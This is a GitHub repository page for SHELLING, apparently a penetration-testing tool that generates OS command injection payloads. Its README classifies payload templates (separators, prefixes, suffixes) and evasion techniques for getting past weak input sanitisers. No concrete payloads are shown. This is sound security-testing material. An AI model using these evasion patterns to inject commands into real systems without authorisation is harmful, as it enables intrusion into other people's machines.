SHELLING - an offensive approach to the anatomy of improperly written OS command injection sanitisers
Perl PHP
Latest commit 825155f Jul 26, 2016 @ewilded committed on GitHub Add files via upload
Updated sample payload sets (after adding the vertical tab for win).
Permalink
Failed to load latest commit information.
test_cases Create escape_shell_cmd.php Jul 23, 2016
README.md Update README.md Jul 16, 2016
nix.txt Add files via upload Jul 26, 2016
nix_win_universal.txt Add files via upload Jul 26, 2016
shelling.pl Update shelling.pl Jul 26, 2016
win.txt Add files via upload Jul 26, 2016

README.md

SHELLING - an offensive approach to the anatomy of improperly written OS command injection sanitisers

In order to improve the accuracy of our blind OS command injection testing, we need a comprehensive, analytic approach. In general, all the injection payloads can fail due to:

  • the eventual syntax of the expression we are injecting into (solution: base payload variants)
  • input sanitising mechanisms, which refuse forbidden characters (solution: evasive techniques)
  • platform specific conditions (e.g. using a windows command on a nix host)
  • bad callback method (e.g. asynchronous execution, no outbound traffic etc., solution: base payload variants)

BASE PAYLOAD VARIANTS (BASIC CASES)

  • MALICIOUS_COMMAND (will this ever happen? yes it will, in argument injections like $USER_SUPPLIED or $(USER_SUPPLIED))
  • MALICIOUS_COMMAND+COMMAND_TERMINATOR (in case there was write and command separators were unallowed?)
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND (for simple injections with no filtering, like cat $USER_SUPPLIED
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR (for simple injections with no filtering and appended fixed shite, like cat $USER_SUPPLIED something)
  • COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX (for simple injections like cat $USER_SUPPLIED something, with filtering like \w+$)
  • PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR (for injections with shitty filtering like ^\w+ and some appended fixed shite, like cat $USER_SUPPLIED something)
  • PREFIX+COMMAND_SEPARATOR+MALICIOUS_COMMAND+COMMAND_SEPARATOR+SUFFIX (for injections with appended fixed shite, like cat $USER_SUPPLIED something, with shitty filtering like ^\w+\s+.*\w+$)
  • PREFIX+MALICIOUS_COMMAND+SUFFIX (`` and $() notations)

EVASIVE TECHNIQUES USED

  • alternative COMMAND_SEPARATORS
  • alternative ARGUMENT_SEPARATORS
  • alternative COMMAND_TERMINATORS
  • additional prefixes and suffixes to go around lax filters
  • additional prefixes and suffixes to fit into quoted expressions

Other evasive techniques considered:

  • alternative payloads to avoid particular badcharacters
  • encoding-related variations, like double URL encoding